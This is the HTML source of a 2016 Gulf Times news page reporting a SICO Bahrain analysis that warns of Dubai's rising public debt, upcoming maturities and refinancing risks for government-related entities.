        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=%26%23039%3BImmense+need+for+close+monitoring%26%23039%3B+of+Dubai+debt%2C+warns+analyst&url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&via=Gulf+Times"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/&amp;media=http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            </div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg" data-caption=""><img width="696" height="372" itemprop="image" class="entry-thumb td-modal-image" src="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline-696x372.jpg" alt="" title="dubai_skyline.jpg"/></a></div>
        <div class="td-a-rec td-a-rec-id-content_top "><div class="td-all-devices"><a href="http://www.jobs24.com/en/"><img src="http://www.gulftimes.com/wp-content/uploads/2016/02/jobs24.2.jpg"/></a></div></div><p> <br />

<div readability="68">
<!----></p>
<p>With Dubai’s debt pile expected to amount to 129 percent of gross domestic product (GDP) this year, there is an “immense need for close monitoring” of debt management, according to a report from SICO Bahrain.</p>

 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_inline">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:320px;height:50px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<p>The investment bank said that while Dubai’s total public debt “appears to be better positioned to weather shocks”, government-related entities (GREs) could be affected by tighter government finances and liquidity, which could result in higher financing costs.</p>
<p>The firm said Dubai’s total debt had risen by 8 percent on annual average basis over the last five years, and that $51 billion of debt will mature between 2016 and 2018.</p>
<p>Of that sum, $20 billion is owed to the government of Abu Dhabi and the UAE central bank, although the facility is renewable every five years.</p>
<p>The report said the cost of the interest on Dubai’s debt was expected to reach $600 million this year, which will account for 5 percent of the city’s revenues.</p>
<p>“Dubai Government’s key maturities (especially between 2016-2018) amid tightening domestic and regional liquidity, and heightened competition from governments to finance deficits, will increase short-term debt rollover risks, thereby translating into a higher cost of funding,” the report stated.</p>
<p>“This will ultimately increase the strain on Dubai’s debt servicing capacity and budget expenditure, while also impacting the financial system.”</p>
</div>
<p><br />
<br /><a href="http://www.arabianbusiness.com/-immense-need-for-close-monitoring-of-dubai-debt-warns-analyst-645427.html">Source link </a></p>
<span class="et_social_bottom_trigger"></span><div class="td-a-rec td-a-rec-id-content_bottom "><div class="td-all-devices"><a href="http://uniquecosmetics.com"><img src="http://www.gulftimes.com/wp-content/uploads/2015/12/728x90.jpg"/></a></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=%26%23039%3BImmense+need+for+close+monitoring%26%23039%3B+of+Dubai+debt%2C+warns+analyst&url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&via=Gulf+Times"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/&amp;media=http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" data-text="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://www.gulftimes.com/2016/09/16/nagorno-karabakh-a-time-bomb-in-the-caucasus/">Nagorno-Karabakh: a time-bomb in the Caucasus?</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="http://www.gulftimes.com/2016/09/16/how-to-save-on-your-first-set-of-ski-equipment/">How to Save on Your First Set of Ski Equipment</a></div></div></div>            <div class="author-box-wrap"><a itemprop="author" href="http://www.gulftimes.com/author/alexcatalin/"><img alt='' src='http://0.gravatar.com/avatar/6bd0fd811df1df0e2fe2ab0bbb27aa69?s=96&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/6bd0fd811df1df0e2fe2ab0bbb27aa69?s=192&amp;d=mm&amp;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a itemprop="author" href="http://www.gulftimes.com/author/alexcatalin/">Gulf Times</a></span></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-16T19:22:36+00:00"><meta itemprop="headline " content="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_1_57dc5d40acf36 = new tdBlock();
block_td_uid_1_57dc5d40acf36.id = "td_uid_1_57dc5d40acf36";
block_td_uid_1_57dc5d40acf36.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"td_block_id_2750333535 td_uid_1_57dc5d40acf36_rand","td_column_number":3,"live_filter_cur_post_id":28273,"live_filter_cur_post_author":"1"}';
block_td_uid_1_57dc5d40acf36.td_column_number = "3";
block_td_uid_1_57dc5d40acf36.block_type = "td_block_related_posts";
block_td_uid_1_57dc5d40acf36.post_count = "3";
block_td_uid_1_57dc5d40acf36.found_posts = "31";
block_td_uid_1_57dc5d40acf36.header_color = "";
block_td_uid_1_57dc5d40acf36.ajax_pagination_infinite_stop = "";
block_td_uid_1_57dc5d40acf36.max_num_pages = "11";
tdBlocksArray.push(block_td_uid_1_57dc5d40acf36);
</script><div class="td_block_wrap td_block_related_posts td_block_id_2750333535 td_uid_1_57dc5d40acf36_rand td_with_ajax_pagination td-pb-border-top"><h4 class="td-related-title"><a id="td_uid_2_57dc5d40ae28c" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_1_57dc5d40acf36" href="#">RELATED ARTICLES</a><a id="td_uid_3_57dc5d40ae2c8" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_1_57dc5d40acf36" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_1_57dc5d40acf36 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/15/adgms-regulatory-body-issues-scam-alert-about-rothschild-gulf-investment-bank/" rel="bookmark" title="ADGM’s regulatory body issues scam alert about Rothschild Gulf Investment Bank"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/09/Abu-Dhabi-Global-Market-(ADGM)-218x150.jpg" alt="" title="ADGM’s regulatory body issues scam alert about Rothschild Gulf Investment Bank"/></a></div>                <a href="http://www.gulftimes.com/uae-business/" class="td-post-category">UAE - Business</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/15/adgms-regulatory-body-issues-scam-alert-about-rothschild-gulf-investment-bank/" rel="bookmark" title="ADGM’s regulatory body issues scam alert about Rothschild Gulf Investment Bank">ADGM’s regulatory body issues scam alert about Rothschild Gulf Investment Bank</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/14/uk-introduces-untearable-plastic-banknote/" rel="bookmark" title="UK introduces untearable plastic banknote"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/09/603978410-218x150.jpg" alt="" title="UK introduces untearable plastic banknote"/></a></div>                <a href="http://www.gulftimes.com/uae-business/" class="td-post-category">UAE - Business</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/14/uk-introduces-untearable-plastic-banknote/" rel="bookmark" title="UK introduces untearable plastic banknote">UK introduces untearable plastic banknote</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/13/super-prime-property-cushioned-in-dubai-says-al-sharq/" rel="bookmark" title="Super-prime property &#039;cushioned&#039; in Dubai, says Al Sharq"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/09/Al-Sharq-Alef-Residences-on-the-Palm-218x150.jpg" alt="" title="Super-prime property &#039;cushioned&#039; in Dubai, says Al Sharq"/></a></div>                <a href="http://www.gulftimes.com/uae-business/" class="td-post-category">UAE - Business</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/13/super-prime-property-cushioned-in-dubai-says-al-sharq/" rel="bookmark" title="Super-prime property &#039;cushioned&#039; in Dubai, says Al Sharq">Super-prime property &#039;cushioned&#039; in Dubai, says Al Sharq</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_57dc5d40acf36" data-td_block_id="td_uid_1_57dc5d40acf36"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_57dc5d40acf36" data-td_block_id="td_uid_1_57dc5d40acf36"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
        
            <div class="td-comments-title-wrap ">
                <h4 class="block-title"><span>NO COMMENTS</span></h4>
            </div>

            				<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/#respond" style="display:none;">Cancel reply</a></small></h3>				<form action="http://www.gulftimes.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
					<div class="clearfix"></div>
				<p class="comment-form-input-wrap">
					<textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
		        </p><p class="comment-form-input-wrap">
			            <span class="comment-req-wrap">
			            	<input class="" id="author" name="author" placeholder="Name:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <span class="comment-req-wrap"><input class="" id="email" name="email" placeholder="Email:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='28273' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>				</form>
					</div><!-- #respond -->
		    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td-a-rec td-a-rec-id-sidebar "><span class="td-adspot-title">- Advertisement -</span>
<ins class="bookingaff" data-aid="964255" data-target_aid="923818" data-prod="banner" data-width="300" data-height="250" data-banner_id="25308">
    <!-- Anything inside will go away once widget is loaded. -->
    <a href="//www.booking.com?aid=923818">Booking.com</a>
</ins>
<script type="text/javascript">
    (function(d, sc, u) {
      var s = d.createElement(sc), p = d.getElementsByTagName(sc)[0];
      s.type = 'text/javascript';
      s.async = true;
      s.src = u + '?v=' + (+new Date());
      p.parentNode.insertBefore(s,p);
      })(document, 'script', '//aff.bstatic.com/static/affiliate_base/js/flexiproduct.js');
</script>

<a href="http://qatarairways.go2cloud.org/aff_c?offer_id=2&aff_id=2276&file_id=168" target="_blank"><img src="http://www.gulftimes.com/wp-content/uploads/2016/08/QR-AE-EN-QRTF2-AFFILIATE-300x250.jpg" width="300" height="250" border="0" /></a></div><script>var block_td_uid_4_57dc5d40b1806 = new tdBlock();
block_td_uid_4_57dc5d40b1806.id = "td_uid_4_57dc5d40b1806";
block_td_uid_4_57dc5d40b1806.atts = '{"sort":"random_posts","custom_title":"MOST POPULAR","limit":"4","header_color":"","ajax_pagination":"load_more","class":"td_block_widget td_block_id_2485290397 td_uid_4_57dc5d40b1806_rand"}';
block_td_uid_4_57dc5d40b1806.td_column_number = "1";
block_td_uid_4_57dc5d40b1806.block_type = "td_block_7";
block_td_uid_4_57dc5d40b1806.post_count = "4";
block_td_uid_4_57dc5d40b1806.found_posts = "548";
block_td_uid_4_57dc5d40b1806.header_color = "";
block_td_uid_4_57dc5d40b1806.ajax_pagination_infinite_stop = "";
block_td_uid_4_57dc5d40b1806.max_num_pages = "137";
tdBlocksArray.push(block_td_uid_4_57dc5d40b1806);
</script><div class="td_block_wrap td_block_7 td_block_widget td_block_id_2485290397 td_uid_4_57dc5d40b1806_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><span>MOST POPULAR</span></h4><div id=td_uid_4_57dc5d40b1806 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/07/eog-resources-and-yates-petroleum-agree-to-combine-in-transaction-valued-at-2-5-billion/" rel="bookmark" title="EOG Resources and Yates Petroleum agree to combine in transaction valued at $2.5 billion"><img width="100" height="33" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/01/bottomlogo-100x33.png" alt="LUKOIL produces one hundred million tonnes of oil in 2015 | Gulf Times" title="EOG Resources and Yates Petroleum agree to combine in transaction valued at $2.5 billion"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/07/eog-resources-and-yates-petroleum-agree-to-combine-in-transaction-valued-at-2-5-billion/" rel="bookmark" title="EOG Resources and Yates Petroleum agree to combine in transaction valued at $2.5 billion">EOG Resources and Yates Petroleum agree to combine in transaction valued...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-09-07T08:31:33+00:00" >September 7, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-07T08:31:33+00:00"><meta itemprop="headline " content="EOG Resources and Yates Petroleum agree to combine in transaction valued at $2.5 billion"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/01/bottomlogo.png"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/03/02/wolff-mercedes-enjoying-best-start/" rel="bookmark" title="Wolff: Mercedes enjoying &#039;best start&#039;"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/03/1456913660-100x70.jpg" alt="" title="Wolff: Mercedes enjoying &#039;best start&#039;"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/03/02/wolff-mercedes-enjoying-best-start/" rel="bookmark" title="Wolff: Mercedes enjoying &#039;best start&#039;">Wolff: Mercedes enjoying &#039;best start&#039;</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-03-02T11:44:45+00:00" >March 2, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-03-02T11:44:45+00:00"><meta itemprop="headline " content="Wolff: Mercedes enjoying &#039;best start&#039;"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/03/1456913660.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/01/uks-cameron-eus-tusk-agreed-only-one-of-4-points-in-weekend-talks/" rel="bookmark" title="UK&#8217;s Cameron, EU&#8217;s Tusk agreed only one of 4 points in weekend talks"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2015/12/Macke_indianer-100x70.jpg" alt="" title="UK&#8217;s Cameron, EU&#8217;s Tusk agreed only one of 4 points in weekend talks"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/01/uks-cameron-eus-tusk-agreed-only-one-of-4-points-in-weekend-talks/" rel="bookmark" title="UK&#8217;s Cameron, EU&#8217;s Tusk agreed only one of 4 points in weekend talks">UK&#8217;s Cameron, EU&#8217;s Tusk agreed only one of 4 points in...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-01T11:32:00+00:00" >February 1, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-01T11:32:00+00:00"><meta itemprop="headline " content="UK&#039;s Cameron, EU&#039;s Tusk agreed only one of 4 points in weekend talks"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2015/12/Macke_indianer.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/01/japanese-feminist-artist-fined/" rel="bookmark" title="Japanese feminist artist fined"><img width="1" height="1" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/1454325349_rc.img" alt="" title="Japanese feminist artist fined"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/01/japanese-feminist-artist-fined/" rel="bookmark" title="Japanese feminist artist fined">Japanese feminist artist fined</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-01T11:15:51+00:00" >February 1, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-01T11:15:51+00:00"><meta itemprop="headline " content="Japanese feminist artist fined"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/1454325349_rc.img"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" id="next-page-td_uid_4_57dc5d40b1806" data-td_block_id="td_uid_4_57dc5d40b1806">Load more<i class="td-icon-font td-icon-menu-down"></i></a></div></div> <!-- ./block --><script>var block_td_uid_5_57dc5d40b6b2a = new tdBlock();
block_td_uid_5_57dc5d40b6b2a.id = "td_uid_5_57dc5d40b6b2a";
block_td_uid_5_57dc5d40b6b2a.atts = '{"sort":"random_posts","custom_title":"HOT NEWS","limit":"4","header_color":"","ajax_pagination":"next_prev","class":"td_block_widget td_block_id_995490248 td_uid_5_57dc5d40b6b2a_rand"}';
block_td_uid_5_57dc5d40b6b2a.td_column_number = "1";
block_td_uid_5_57dc5d40b6b2a.block_type = "td_block_15";
block_td_uid_5_57dc5d40b6b2a.post_count = "4";
block_td_uid_5_57dc5d40b6b2a.found_posts = "548";
block_td_uid_5_57dc5d40b6b2a.header_color = "";
block_td_uid_5_57dc5d40b6b2a.ajax_pagination_infinite_stop = "";
block_td_uid_5_57dc5d40b6b2a.max_num_pages = "137";
tdBlocksArray.push(block_td_uid_5_57dc5d40b6b2a);
</script><div class="td_block_wrap td_block_15 td_block_widget td_block_id_995490248 td_uid_5_57dc5d40b6b2a_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><span>HOT NEWS</span></h4><div id=td_uid_5_57dc5d40b6b2a class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/03/16/dubai-holding-unit-says-declines-bond-buyback-on-pricing-mismatch/" rel="bookmark" title="Dubai Holding unit says declines bond buyback on pricing mismatch"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/03/DFM-Dubai-Finacial-Market-218x150.jpg" alt="" title="Dubai Holding unit says declines bond buyback on pricing mismatch"/></a></div>                <a href="http://www.gulftimes.com/uae-business/qatar/" class="td-post-category">Qatar</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/03/16/dubai-holding-unit-says-declines-bond-buyback-on-pricing-mismatch/" rel="bookmark" title="Dubai Holding unit says declines bond buyback on pricing mismatch">Dubai Holding unit says declines bond buyback on pricing mismatch</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-03-16T01:16:52+00:00"><meta itemprop="headline " content="Dubai Holding unit says declines bond buyback on pricing mismatch"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/03/DFM-Dubai-Finacial-Market.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/03/12/crude-oil-shipments-by-rail-from-midwest-to-coastal-regions-decline/" rel="bookmark" title="Crude oil shipments by rail from Midwest to coastal regions decline"><img width="137" height="33" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/01/bottomlogo.png" alt="LUKOIL produces one hundred million tonnes of oil in 2015 | Gulf Times" title="Crude oil shipments by rail from Midwest to coastal regions decline"/></a></div>                <a href="http://www.gulftimes.com/uae-business/oil-market/" class="td-post-category">Oil Market</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/03/12/crude-oil-shipments-by-rail-from-midwest-to-coastal-regions-decline/" rel="bookmark" title="Crude oil shipments by rail from Midwest to coastal regions decline">Crude oil shipments by rail from Midwest to coastal regions decline</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-03-12T11:48:02+00:00"><meta itemprop="headline " content="Crude oil shipments by rail from Midwest to coastal regions decline"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/01/bottomlogo.png"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/03/09/sauber-pays-overdue-staff-salaries/" rel="bookmark" title="Sauber pays overdue staff salaries"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/03/1e2f4a9f41248a9796f41b91980c6a7a-218x150.jpg" alt="" title="Sauber pays overdue staff salaries"/></a></div>                <a href="http://www.gulftimes.com/sport/formula-one/" class="td-post-category">Formula One</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/03/09/sauber-pays-overdue-staff-salaries/" rel="bookmark" title="Sauber pays overdue staff salaries">Sauber pays overdue staff salaries</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-03-09T23:51:32+00:00"><meta itemprop="headline " content="Sauber pays overdue staff salaries"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/03/1e2f4a9f41248a9796f41b91980c6a7a.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
